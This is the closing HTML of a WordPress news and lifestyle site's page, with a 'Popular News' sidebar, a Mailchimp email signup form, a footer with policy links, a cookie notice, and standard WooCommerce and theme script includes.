	</div><!-- #primary -->


<aside id="secondary" class="widget-area" itemscope itemtype="http://schema.org/WPSideBar">
	<section id="search-2" class="widget widget_search"><form role="search" method="get" class="search-form" action="https://techninzaz.com/">
				<label>
					<span class="screen-reader-text">Search for:</span>
					<input type="search" class="search-field" placeholder="Search &hellip;" value="" name="s" />
				</label>
				<input type="submit" class="search-submit" value="Search" />
			</form></section><style>
.rpwe-block ul{list-style:none!important;margin-left:0!important;padding-left:0!important;}.rpwe-block li{border-bottom:1px solid #eee;margin-bottom:10px;padding-bottom:10px;list-style-type: none;}.rpwe-block a{display:inline!important;text-decoration:none;}.rpwe-block h3{background:none!important;clear:none;margin-bottom:0!important;margin-top:0!important;font-weight:400;font-size:12px!important;line-height:1.5em;}.rpwe-thumb{border:1px solid #EEE!important;box-shadow:none!important;margin:2px 10px 2px 0;padding:3px!important;}.rpwe-summary{font-size:12px;}.rpwe-time{color:#bbb;font-size:11px;}.rpwe-comment{color:#bbb;font-size:11px;padding-left:5px;}.rpwe-alignleft{display:inline;float:left;}.rpwe-alignright{display:inline;float:right;}.rpwe-aligncenter{display:block;margin-left: auto;margin-right: auto;}.rpwe-clearfix:before,.rpwe-clearfix:after{content:"";display:table !important;}.rpwe-clearfix:after{clear:both;}.rpwe-clearfix{zoom:1;}
</style>
	<section id="rpwe_widget-3" class="widget rpwe_widget recent-posts-extended"><h2 class="widget-title" itemprop="name">Popular News</h2><div  class="rpwe-block "><ul class="rpwe-ul"><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://techninzaz.com/what-the-stars-of-baywatch-look-like-now/"  rel="bookmark"><img class="rpwe-alignleft rpwe-thumb" src="https://techninzaz.com/wp-content/uploads/2019/12/67c565a8597791ae08f39c089f8a2bce-100x100.jpg" alt="What the stars of Baywatch look like now"></a><h3 class="rpwe-title"><a href="https://techninzaz.com/what-the-stars-of-baywatch-look-like-now/" title="Permalink to What the stars of Baywatch look like now" rel="bookmark">What the stars of Baywatch look like now</a></h3><time class="rpwe-time published" datetime="2019-09-30T00:13:03+00:00">September 30, 2019</time></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://techninzaz.com/karls-most-memorable-moments-on-today/"  rel="bookmark"><img class="rpwe-alignleft rpwe-thumb" src="https://techninzaz.com/wp-content/uploads/2019/12/cb43a9586ce7452df8350bcca5c4b904-100x100.jpg" alt="Karl’s most memorable moments on Today"></a><h3 class="rpwe-title"><a href="https://techninzaz.com/karls-most-memorable-moments-on-today/" title="Permalink to Karl’s most memorable moments on Today" rel="bookmark">Karl’s most memorable moments on Today</a></h3><time class="rpwe-time published" datetime="2019-10-23T10:42:38+00:00">October 23, 2019</time></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://techninzaz.com/new-firefox-suggests-ways-to-get-more-out-of-the-web/"  rel="bookmark"><img class="rpwe-alignleft rpwe-thumb" src="https://techninzaz.com/wp-content/uploads/2019/12/firefox-suggestions-enhancer-for-youtube-100x100.jpg" alt="New Firefox suggests ways to get more out of the web"></a><h3 class="rpwe-title"><a href="https://techninzaz.com/new-firefox-suggests-ways-to-get-more-out-of-the-web/" title="Permalink to New Firefox suggests ways to get more out of the web" rel="bookmark">New Firefox suggests ways to get more out of the web</a></h3><time class="rpwe-time published" datetime="2019-09-20T07:28:08+00:00">September 20, 2019</time></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://techninzaz.com/instagrams-new-tools-improve-account-transparency/"  rel="bookmark"><img class="rpwe-alignleft rpwe-thumb" src="https://techninzaz.com/wp-content/uploads/2019/12/ig-2-100x100.jpg" alt="Instagram&#8217;s new tools improve account transparency"></a><h3 class="rpwe-title"><a href="https://techninzaz.com/instagrams-new-tools-improve-account-transparency/" title="Permalink to Instagram&#8217;s new tools improve account transparency" rel="bookmark">Instagram&#8217;s new tools improve account transparency</a></h3><time class="rpwe-time published" datetime="2019-09-29T22:40:10+00:00">September 29, 2019</time></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://techninzaz.com/fighting-with-my-family-a-wrestling-comedy-that-suplexes-your-heart/"  rel="bookmark"><img class="rpwe-alignleft rpwe-thumb" src="https://techninzaz.com/wp-content/uploads/2019/12/sundance-2019-fighting-with-my-family-sundance-2019-46703985961-f12f7f733d-o-100x100.jpg" alt="Fighting With My Family: A wrestling comedy that suplexes your heart"></a><h3 class="rpwe-title"><a href="https://techninzaz.com/fighting-with-my-family-a-wrestling-comedy-that-suplexes-your-heart/" title="Permalink to Fighting With My Family: A wrestling comedy that suplexes your heart" rel="bookmark">Fighting With My Family: A wrestling comedy that suplexes your heart</a></h3><time class="rpwe-time published" datetime="2019-10-14T08:47:19+00:00">October 14, 2019</time></li></ul></div><!-- Generated by http://wordpress.org/plugins/recent-posts-widget-extended/ --></section></aside><!-- #secondary -->
            </div><!-- .row/not-found -->
        </div><!-- #content -->
            </div><!-- .container/.main-content -->
        <footer id="colophon" class="site-footer" itemscope itemtype="http://schema.org/WPFooter">
    
    <div class="footer-t">
		<div class="container">
			<div class="row column-2">
                            <div class="col">
                   <section id="mc4wp_form_widget-3" class="widget widget_mc4wp_form_widget"><h2 class="widget-title" itemprop="name">For Email News every day!</h2><script>(function() {
	if ( ! window.mc4wp) {
		window.mc4wp = {
			listeners: [],
			forms    : {
				on: function (event, callback) {
					window.mc4wp.listeners.push(
						{
							event   : event,
							callback: callback
						}
					);
				}
			}
		}
	}
})();
</script><!-- Mailchimp for WordPress v4.7.4 - https://wordpress.org/plugins/mailchimp-for-wp/ --><form id="mc4wp-form-1" class="mc4wp-form mc4wp-form-269" method="post" data-id="269" data-name="Subscribe for us" ><div class="mc4wp-form-fields"><p>
	<label>Email address: 
		<input type="email" name="EMAIL" placeholder="Your email address" required />
</label>
</p>

<p>
	<input type="submit" value="Sign up" />
</p></div><label style="display: none !important;">Leave this field empty if you're human: <input type="text" name="_mc4wp_honeypot" value="" tabindex="-1" autocomplete="off" /></label><input type="hidden" name="_mc4wp_timestamp" value="1577463635" /><input type="hidden" name="_mc4wp_form_id" value="269" /><input type="hidden" name="_mc4wp_form_element_id" value="mc4wp-form-1" /><div class="mc4wp-response"></div></form><!-- / Mailchimp for WordPress Plugin --></section> 
                </div>
                            <div class="col">
                   <section id="nav_menu-3" class="widget widget_nav_menu"><h2 class="widget-title" itemprop="name">Our policies</h2><div class="menu-legal-menu-container"><ul id="menu-legal-menu" class="menu"><li id="menu-item-6" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-6"><a href="/terms-of-service">Terms of Service</a></li>
<li id="menu-item-8" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8"><a href="/privacy-policy">Privacy Policy</a></li>
<li id="menu-item-13" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-13"><a href="/dmca">DMCA</a></li>
<li id="menu-item-16" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-16"><a href="/cookie-privacy-policy">Cookie Privacy Policy</a></li>
</ul></div></section> 
                </div>
                        </div>
		</div>
	</div>
        <div class="site-info">
		<div class="container">
			<span class="copyright">2019 Copyright  <a href="https://techninzaz.com/">TechNinzaz</a>. </span>Blossom Feminine | Developed By <a href="https://blossomthemes.com/" rel="nofollow" target="_blank">Blossom Themes</a>. Powered by <a href="https://wordpress.org/" target="_blank">WordPress</a>.                    
		</div>
	</div>
        </footer><!-- #colophon -->
        <button aria-label="go to top button" id="blossom-top">
		<span><i class="fa fa-angle-up"></i>TOP</span>
	</button>
        </div><!-- #page -->
    <script>(function() {function addEventListener(element,event,handler) {
	if (element.addEventListener) {
		element.addEventListener( event,handler, false );
	} else if (element.attachEvent) {
		element.attachEvent( 'on' + event,handler );
	}
}
function maybePrefixUrlField() {
	if (this.value.trim() !== '' && this.value.indexOf( 'http' ) !== 0) {
		this.value = "http://" + this.value;
	}
}

var urlFields = document.querySelectorAll( '.mc4wp-form input[type="url"]' );
if ( urlFields && urlFields.length > 0 ) {
	for ( var j = 0; j < urlFields.length; j++ ) {
		addEventListener( urlFields[j],'blur',maybePrefixUrlField );
	}
}
/* test if browser supports date fields */
var testInput = document.createElement( 'input' );
testInput.setAttribute( 'type', 'date' );
if ( testInput.type !== 'date') {

	/* add placeholder & pattern to all date fields */
	var dateFields = document.querySelectorAll( '.mc4wp-form input[type="date"]' );
	for (var i = 0; i < dateFields.length; i++) {
		if ( ! dateFields[i].placeholder) {
			dateFields[i].placeholder = 'YYYY-MM-DD';
		}
		if ( ! dateFields[i].pattern) {
			dateFields[i].pattern = '[0-9]{4}-(0[1-9]|1[012])-(0[1-9]|1[0-9]|2[0-9]|3[01])';
		}
	}
}
})();</script>	<script type="text/javascript">
		var c = document.body.className;
		c = c.replace(/woocommerce-no-js/, 'woocommerce-js');
		document.body.className = c;
	</script>
	<script type='text/javascript' src='https://techninzaz.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.70'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var wc_add_to_cart_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%","i18n_view_cart":"View cart","cart_url":"https:\/\/techninzaz.com\/cart\/","is_cart":"","cart_redirect_after_add":"no"};
/* ]]> */
</script>
<script type='text/javascript' src='https://techninzaz.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=3.8.1'></script>
<script type='text/javascript' src='https://techninzaz.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var woocommerce_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%"};
/* ]]> */
</script>
<script type='text/javascript' src='https://techninzaz.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=3.8.1'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var wc_cart_fragments_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%","cart_hash_key":"wc_cart_hash_97fe696ad257a8c7b59a8adc1845a7be","fragment_name":"wc_fragments_97fe696ad257a8c7b59a8adc1845a7be","request_timeout":"5000"};
/* ]]> */
</script>
<script type='text/javascript' src='https://techninzaz.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=3.8.1'></script>
<script type='text/javascript' src='https://techninzaz.com/wp-content/themes/blossom-feminine/js/all.min.js?ver=5.6.3'></script>
<script type='text/javascript' src='https://techninzaz.com/wp-content/themes/blossom-feminine/js/v4-shims.min.js?ver=5.6.3'></script>
<script type='text/javascript' src='https://techninzaz.com/wp-content/themes/blossom-feminine/js/sticky-kit.min.js?ver=1.1.3'></script>
<script type='text/javascript' src='https://techninzaz.com/wp-content/themes/blossom-feminine/js/owl.carousel.min.js?ver=2.2.1'></script>
<script type='text/javascript' src='https://techninzaz.com/wp-content/themes/blossom-feminine/js/owl.carousel.aria.min.js?ver=2.0.0'></script>
<script type='text/javascript' src='https://techninzaz.com/wp-content/themes/blossom-feminine/js/jquery.matchHeight.min.js?ver=0.7.2'></script>
<script type='text/javascript' src='https://techninzaz.com/wp-content/themes/blossom-feminine/js/wow.min.js?ver=1.1.3'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var blossom_feminine_data = {"rtl":"","animation":"","auto":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='https://techninzaz.com/wp-content/themes/blossom-feminine/js/custom.min.js?ver=1.3.0'></script>
<script type='text/javascript' src='https://techninzaz.com/wp-includes/js/comment-reply.min.js?ver=5.3.2'></script>
<script type='text/javascript' src='https://techninzaz.com/wp-includes/js/wp-embed.min.js?ver=5.3.2'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var mc4wp_forms_config = [];
/* ]]> */
</script>
<script type='text/javascript' src='https://techninzaz.com/wp-content/plugins/mailchimp-for-wp/assets/js/forms-api.min.js?ver=4.7.4'></script>
<!--[if lte IE 9]>
<script type='text/javascript' src='https://techninzaz.com/wp-content/plugins/mailchimp-for-wp/assets/js/third-party/placeholders.min.js?ver=4.7.4'></script>
<![endif]-->

			<div id="cookie-notice" role="banner" class="cn-bottom bootstrap" style="color: #fff; background-color: #000;" aria-label="Cookie Notice"><div class="cookie-notice-container"><span id="cn-notice-text">We use cookies to ensure that we give you the best experience on our website. If you continue to use this site we will assume that you are happy with it.</span><a href="#" id="cn-accept-cookie" data-cookie-set="accept" class="cn-set-cookie cn-button bootstrap button">Accept</a><a href="#" id="cn-refuse-cookie" data-cookie-set="refuse" class="cn-set-cookie cn-button bootstrap button">Reject</a><a href="https://techninzaz.com/cookie-privacy-policy/" target="_blank" id="cn-more-info" class="cn-more-info cn-button bootstrap button">Cookie Privacy policy</a>
				</div>
				<div class="cookie-notice-revoke-container"><a href="#" class="cn-revoke-cookie cn-button bootstrap button">Revoke cookies</a></div>
			</div>
</body>
</html>
